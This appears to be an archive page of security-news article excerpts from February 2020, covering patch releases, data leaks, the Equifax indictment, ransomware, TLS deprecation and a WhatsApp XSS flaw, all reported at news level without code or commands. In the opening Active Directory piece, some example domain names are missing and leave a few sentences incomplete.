The problem lies with Microsoft’s Active Directory. This product, which provides identity management services across most of the world’s enterprises, handles internal URLs using its own domain naming system which is connected to but separate from the public domain naming system (DNS).

Because Active Directory is controlling what happens inside the company network, the company can host its services on whatever domains it likes. So, let’s say that your company hosts all of the services that its employees can access from inside the company network on the domain.

The company HR portal might be accessible via a Fully Qualified Domain Name (FQDN) like, for example, assuming that was your company’s domain. Active Directory ensures that people inside the company network who type into their browser are sent to the company HR portal.

No one wants to type in the full name for a server that they visit every day from inside the company network. So, Windows makes that easier too, using a feature called DNS devolution. It works by appending portions of the Active Directory domain to an unqualified domain name. In our example, you could just type hr-portal, and Windows will try appending to see if it gets a hit.

Windows machines use a search list to tell them what to use during DNS devolution. The search list is either configured in the registry or sometimes declared explicitly in a file. As section 3.1 of this ICAAN Security and Stability Advisor Committee document on DNS search list processing points out, search list processing is affected by factors including the computer’s hostname (which you’ll be asked for when setting up business versions of Windows).


Firefox six-weekly security fixes are out – get them now!

By Paul Ducklin

Mozilla’s own “patch Tuesday” for Firefox happened this week.

Rather than patching once a calendar month, Mozilla goes for every sixth Tuesday – or every 42 days, which we call Fortytwosday in a hat-tip to HHGttG.

This update takes the regular build of Firefox to 73.0, while the long-term release, which includes security fixes but not feature updates, goes to 68.5.0esr.

ESR is short for Extended Support Release, and if you want to know which regular release it matches up to for security patches, just add the leftmost two numbers together, and notice that 68+5 = 73.

The good news is that none of the security holes fixed in this update seem to be what are known as zero-day vulnerabilities, which is the industry term for bugs that the crooks figure out first.

(The name zero day reflects the fact that even if you are the sort of person who patches as soon as you can, there would have been zero days on which you could have been ahead of the crooks.)


IE zero day and heap of RDP flaws fixed in February Patch Tuesday

By John E Dunn

Weeks after the world first got wind of it, Microsoft has finally patched the Internet Explorer (IE) zero-day flaw the company said in January was being used in “limited targeted attacks”.

The fix is part of the February Patch Tuesday update that features a record 99 security vulnerabilities including 12 marked as ‘critical’ and 87 ‘important’.

The first indication of the IE zero-day, now identified as CVE-2020-0674, appeared when Mozilla fixed a very similar issue in Firefox on 8 January, less than two days after the appearance of version 72.

The attacks were reported to Mozilla by a third party which, in a later deleted reference, mentioned that the same issue also affected IE. On 17 January, Microsoft issued its own alert regarding the Scripting Engine memory corruption flaw, citing IE’s Enhanced Security Configuration protection as mitigation against attacks.

This matters because IE code is buried inside Windows 10, which means it presents a risk even to those not using it. In the last year, IE has had other similar troubles, including CVE-2019-1367, a zero-day in September, and a proof-of-concept vulnerability reported in April.

And that’s not all – CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, and CVE-2020-0767 are all Scripting Engine memory corruption issues connected to Edge and IE browsers.


Google to force Nest users to turn on 2FA

By Lisa Vaas

Nest owners, if you aren’t already flying with two-factor authentication (2FA) on your accounts, get ready for Google to push you into spreading those security wings.

On Tuesday – which, appropriately enough, was Safer Internet DayGoogle announced that in the spring (or in the fall, for those in the Southern Hemisphere), it will start forcing users of its Nest webcams and other products to use 2FA to secure their accounts.

Nest users who haven’t yet enrolled in the 2FA option or migrated to a Google account will be required to take an extra step by verifying their identity via email, Google said in a blog post. When a new login hits your Nest account, you’ll get a login notification from containing a six-digit verification code. Without that code, anybody trying to get into your account will be locked out.

That should help with, say, keeping creeps from talking to your baby through a Nest security cam, or trying to crank up your Nest thermostat to tropical levels, both of which have happened to people who say they weren’t aware that 2FA is an option.


This will greatly reduce the likelihood of an unauthorized person gaining access to your Nest account.

Google started sending out login notifications for Nest accounts in December 2019. Sometimes, simply being told that somebody’s logged into your account is all it takes to spot suspicious activity, Google said:

Every time someone on your account logs in you’ll receive an email notification. That way if it wasn’t you, you can take action immediately.


February 12, 2020 »

Data about inmates and jail staff spilled by leaky prison app

By Lisa Vaas

Inmates’ and correctional facilities employees’ data has been sloshed onto the web, unencrypted and unsecured, in yet another instance of a misconfigured cloud storage bucket.

Security researchers at vpnMentor came across the leak on 3 January during a web-mapping project that was scanning a range of Amazon S3 addresses to look for open holes in systems.

The leaky bucket belongs to JailCore, a cloud-based app meant to manage correctional facilities, including by helping to ensure better compliance with insurance standards by doing things like tracking inmates’ medications and activities. That means that the app handles personally identifiable information (PII) that includes detainees’ names, mugshots, medication names, and behaviors: going to the lavatory, sleeping, pacing, or cursing, for example.

JailCore also tracks correctional officers’ names, sometimes their signatures, and their personally filled out observational reports on the detainees.

Some of the PII is meant to be freely available to the public: details such as detainee names, dates of birth and mugshots are already publicly available from most state or county websites within rosters of current inmates. But another portion of the data is not: that portion includes specific medication information and additional sensitive data, vpnMentor says, such as the PII of correctional officers.

JailCore closed down the data leak between 15 and 16 January: 10 or 11 days after vpnMentor notified it about the breach (and about the same time that the security firm reached out to the Pentagon about it). The company initially refused to accept vpnMentor’s disclosure findings, the firm said.


US charges four Chinese military members with Equifax hack

By Lisa Vaas

The US has charged the Chinese military with plundering Equifax in 2017.

The Justice Department (DOJ) on Monday released a nine-count indictment that accused four members of the People’s Liberation Army (PLA) of being hackers behind the breach, which was one of the largest in US history.

The breach exposed millions of names and dates of birth, taxpayer ID numbers, physical addresses, and other personal information that could lead to identity theft and fraud. Besides the original estimate of 145.5 million Americans who were affected, the breach also hit 15.2 million Brits and some 100,000 Canadians.

The indictment charged the four with a three-month campaign during which they allegedly hacked into computers of the credit-reporting agency and siphoned off the sensitive financial data and other personally identifiable information (PII) from all those people.

The accused are Wu Zhiyong, Wang Qian, Xu Ke, and Liu Lei: all members of the PLA’s 54th Research Institute, which is part of the Chinese military.

How they allegedly pulled it off

According to the indictment, the four allegedly pried open Equifax by exploiting a vulnerability in the Apache Struts Web Framework software used by the credit reporting agency’s online dispute portal.

We already knew it was done via a web app vulnerability and that it was a months-old Struts vulnerability: specifically, a nasty server-side remote code execution (RCE) bug made known to the public in March 2017.


Mozilla issues final warning to websites using TLS 1.0

By John E Dunn

Sometime this March, the Firefox, Chrome, Safari and Edge browsers will start throwing up warnings when users visit websites that only support Transport Layer Security (TLS) versions 1.0 or 1.1.

Announced in October 2018 as part of a joint plan to phase out support, the implications for any holdout sites are stark – enable the later TLS 1.2 or, ideally, 1.3, or face having no traffic.

According to the latest Mozilla reminder, visitors using Firefox will start seeing a ‘Secure Connection Failed’ message with accompanying SSL_ERROR_UNSUPPORTED_VERSION for anyone in doubt.

Initially, it will be possible to override this but only for so long. Sooner rather than later, Mozilla says that too will disappear:

We’re committed to completely eradicating weak versions of TLS because at Mozilla we believe that user security should not be treated as optional.

Other browsers will follow suit, with the Chrome browser having adopted ‘Your connection to this site is not fully secure’ messages last month with full blocking due to begin in March.


February 11, 2020 »

5 tips for businesses on Safer Internet Day

By Paul Ducklin

Safer Internet Day is here!

Note that it’s more than just One Safe Internet Day, where you spend 24 hours taking security seriously, only to fall back on bad habits the day after.

As the old saying goes, “Cybersecurity is a journey, not a destination,” and that’s why we have SAFER internet day – it’s all about getting BETTER at cybersecurity, no matter how safe you think you are already.

So here are five things you can do in your business, regardless of its size, to help you and your colleagues keep ahead of the cybercrooks.


We’ve won part of this battle already, because most businesses these days do install security patches.

At least, they install updates eventually. But there are still many organization’s out there that take their time about it, putting off updates for weeks or even months “in case something goes wrong”.

The problem is that once crooks know about new security holes, they don’t put off using them – so the longer you lag behind, the more vulnerable your business becomes. Learn how to test updates quickly – you can start with one computer and make notes from there – and have a plan for rolling back in the rare event that something does go wrong.


Google Chrome to start blocking downloads served via HTTP

By John E Dunn

Google has announced a timetable for phasing out insecure file downloads in the Chrome browser, starting with desktop version 81 due out next month.

Known in jargon as ‘mixed content downloads’, these are files such as software executables, documents and media files offered from secure HTTPS websites over insecure HTTP connections.

This is a worry because a user seeing the HTTPS padlock on a site visited using Chrome might assume that any downloads it offers are also secure (HTTP sites offering downloads are already marked ‘not secure’).

That, of course, is a risky assumption, as Google’s announcement points out:

Insecurely-downloaded files are a risk to users’ security and privacy. For instance, insecurely downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read users’ insecurely-downloaded bank statements.

Google will introduce this change gradually rather than all at once, at first offering warnings about executable downloads via HTTP in versions 81 and 82 of the desktop browser.

From version 83, due in June, these will be blocked outright and Chrome will start offering warnings for archives files such as .zip.

In subsequent versions, the same warn-and-block process will start to apply for downloads such as .doc and PDFs, images, videos and music files until, by Chrome version 86 in October, all downloads via HTTP will be blocked.

Mobile versions of Chrome will use the same timetable except that each milestone will apply one version later than for the desktop version.

Enterprise and education customers will be able to disable the policy on a per-site basis using the InsecureContentAllowedForUrls policy, Google said.


Facebook encrypted messaging will ‘create hiding places for child abuse’

By Lisa Vaas

Last year, Facebook announced that it would stitch the technical infrastructure of all of its chat apps – Messenger, WhatsApp and Instagram – together so that users of each app can talk to each other more easily.

The plan includes slathering the end-to-end encryption of WhatsApp – which keeps anyone, including law enforcement and even Facebook itself, from reading the content of messages – onto Messenger and Instagram. At this point, Facebook Messenger supports end-to-end encryption in “secure connections” mode: a mode that’s off by default and has to be enabled for every chat. Instagram has no end-to-end encryption on its chats at all.

“As you would expect, there is a lot of discussion and debate as we begin the long process of figuring out all the details of how this will work,” Facebook has said – including, of course, the fact that law enforcement would be shut out of viewing messages on yet more chat apps.

That discussion now includes an open letter, signed by 129 child protection organizations around the world and sent to CEO Mark Zuckerberg on Thursday. The groups, led by the UK’s National Society for the Prevention of Cruelty to Children (NSPCC), are urging the company to stop its plans until “sufficient safeguards” are in place.

According to news outlets that have seen the letter, it says that Facebook could be building on “years of sophisticated efforts” to protect children online, but is instead “inclined to blindfold itself.”

More from the letter:

We urge you to recognize and accept that an increased risk of child abuse being facilitated on or by Facebook is not a reasonable trade-off to make. Children should not be put in harm’s way either as a result of commercial decisions or design choices.

The NSPCC said in December 2019 that police in the UK recorded over 4,000 instances – an average of 11 per day – where Facebook apps were used in child abuse image and online child sexual offenses during the prior year.


February 10, 2020 »

FBI director warns of sustained Russian disinformation threat

By Danny Bradbury

Russia is still using social media in a sustained campaign to dabble in US affairs, according to FBI director Chris Wray.

Wray, speaking at a House Judiciary Hearing on FBI Oversight on Wednesday 5 February, said that Russia is still engaged in an “information warfare” campaign against the US, according to a report by the Associated Press.

Wray singled out disinformation campaigns as a particular threat to the US in his testimony, warning:

The goal of these foreign influence operations directed against the United States is to spread disinformation, sow discord, push foreign nations’ policy agendas, and ultimately undermine confidence in our democratic institutions and values.

The FBI has a three-pillar approach, Wray said, beginning with an open investigation into foreign influence activities spanning field offices around the country. Second, it works with international partners and US intelligence agencies to share information. Finally, it regularly meets with social media companies to brief them on the latest threats, sharing specific account information, he said.


Frustrated author cybersquats novelist’s website

By Danny Bradbury

If you visit the website of renowned Canadian novelist Patrick deWitt today, you’ll see a surprising message. “THIS IS NOT PATRICK DEWITT”, it says.

That’s because the domain has been taken over by a cybersquatter. Not just any cybersquatter, mind – this one has literary ambitions.

The unpublished writer apparently noticed that deWitt had let the domain lapse, and decided to register it for themselves. Clicking on the page takes you to an about section, which announces:

Patrick deWitt is an award-winning author who has written 4 best-selling novels.

This is not his site.

I have not made any films. I have not written any award-winning books.

If you want to do something that is singularly unrewarding, write a novel.

Anyway, Patrick deWitt wasn’t using this site, so rather than waste your time with a blank page, I thought I would join you here and we could share a moment.

As if that wasn’t cheeky enough, the sneaky scribe has also posted their own manuscript on the site. Called in God’s Silence, Them Devils Sang, the author describes it as an acid western.

The news hit the internet last week, but this has been going on for a while. The first instance of the cybersquatter’s site shows up on the Wayback Machine (a site that archives snapshots of web pages) on 10 November 2018. Let’s Encrypt issued an SSL certificate for the domain on 11 July 2019, although the mysterious cybersquatter doesn’t seem to be using it as yet. As of today, the site was still using plain old HTTP.


RobbinHood – the ransomware that brings its own bug

By Paul Ducklin

Ransomware is one of the most feared cybercrime problems of the modern era.

The idea of malware that scrambles your files and demands money to get them back is not new – the first widespread attack happened back in 1989 – but the scale of the threat has changed dramatically in the last few years.

Up to about 2010 or 2011, ransomware was little more than a lab curiosity…

…until the crooks finally figured out how to extract money from their desperate victims, thanks to the anonymity (more or less) afforded by the Dark Web and the untraceable (more or less) payments offered through the use of cryptocurrencies.

Crooks such as the gang behind the Cryptolocker ransomware were able to make millions, perhaps even hundreds of millions, of dollars by infecting hundreds of thousands of users and businesses, and then demanding $300 a time to unlock each user’s files.

But that approach has changed recently, with the big-money ransomware criminals carrying out fewer but much bigger attacks.

These days, ransomware operations are very often aimed at whole networks, or even at centrally-managed collections of networks.

The idea is that the crooks are still planning to scramble hundreds or thousands of computers in an attack, but instead of blackmailing the owner of each computer to pay a few hundred dollars, they blackmail the operators of the entire network to pay a huge lump sum.

Those sums typically run from $50,000 to $5,000,000, with the victims sometimes left with little choice but to pay up because their whole business has ground to a halt, not just a few computers here and there.


Researchers transmit data covertly by altering screen brightness

By Danny Bradbury

The normal way to steal data from a compromised computer is to retrieve it over a network. If that computer isn’t connected to one, it gets a little trickier.

Researchers at Ben-Gurion University of the Negev have made a name for themselves figuring out how to get data out of air-gapped computers. They’ve dreamed up ways to communicate using speakers, blinking LEDs in PCs, infrared lights in surveillance cameras, and even computer fans.

Now, they’ve figured out a way to retrieve data from a disconnected computer by altering its LCD display’s pixel density just enough for a nearby camera to pick it up.

In a paper published this month, the researchers describe what they call an “optical covert channel” which cameras can detect, but which users cannot. They use one of the three colors in LCD pixels which normally combine to give the pixel a range of hues.

Their technique adjusts the red color component in pixels on the screen by 3%, which is apparently not enough for users to notice. A camera located six metres from the 19-inch screen was nevertheless able to detect the difference.

Optical exfiltration techniques have cropped up before, they explain, but most of them have been easily detectable by users. Conversely, an attacker could theoretically use this one even while a user was working at the compromised machine.

We say “theoretically” because in practice there are a lot of challenges involved in this attack. The first is that the computer has to be compromised in the first place, which means getting to its physical location. Then, you could infect it with a USB stick, but if you’ve reached that point, presumably you could just copy the data to the stick.


Facebook, Google, YouTube order Clearview to stop scraping faceprints

By Lisa Vaas

Clearview AI, the facial recognition company that’s scraped the web for three billion faceprints and sold them all (or given them away) to 600 police departments so they could identify people within seconds, has received yet more cease-and-desist letters from social media giants.

The first came from Twitter. A few weeks ago, Twitter told Clearview to stop collecting its data and to delete whatever it’s got.

Facebook has also demanded that Clearview stop scraping photos because the action violates its policies, and now Google and YouTube are likewise telling the audacious startup to stop violating their policies against data scraping.

Clearview’s take on all this? Defiance. It’s got a legal right to data scraping, it says.

In an interview on Wednesday with CBS This Morning, Clearview AI founder and CEO Hoan Ton-That told listeners to trust him. The technology is only to be used by law enforcement, and only to identify potential criminals, he said.

The artificial intelligence (AI) program can identify someone by matching photos of unknown people to their online photos and the sites where they were posted. Ton-That claims that the results are 99.6% accurate.

Besides, he said, it’s his right to collect public photos to feed his facial recognition app:

There is also a First Amendment right to public information. So, the way we have built our system is to only take publicly available information and index it that way.

Not everybody agrees. Some people think that their facial images shouldn’t be gobbled up without their consent. In fact, the nation’s strictest biometrics privacy law – the Biometric Information Privacy Act (BIPA) – says doing so is illegal. Clearview is already facing a potential class action lawsuit, filed last month, for allegedly violating that law.


Update now – WhatsApp flaw gave attackers access to local files

By John E Dunn

Does WhatsApp have a lot of vulnerabilities or are there simply a lot of people looking for them?

Ask PerimeterX researcher Gal Weizman, who last year set about poking the world’s most popular messaging platform to see whether he could turn up any new weaknesses.

Sure enough, this week we learned that he uncovered a clutch of vulnerabilities that led him to a tasty cross-site scripting (XSS) flaw affecting WhatsApp desktop for Windows and macOS when paired with WhatsApp for iPhone.

Patched this week as CVE-2019-18426, it’s the sort of weakness iPhone WhatsApp desktop users will be glad to see the back of.

The immediate problem was caused by a gap in WhatsApp’s Content Security Policy (CSP), a security layer used to protect against common types of attack, including XSS.

Using modified JavaScript in a specially crafted message, an attacker could exploit this to feed victims phishing and malware links in weblink previews in ways that would be invisible to the victim.

According to Weizman, this is probably remotely exploitable although the users would still need to click on the link for an attack to succeed.

However, it could also be used to gain read permission to the local file system, that is the ability to access and open files and, potentially, for remote code execution (RCE).


« older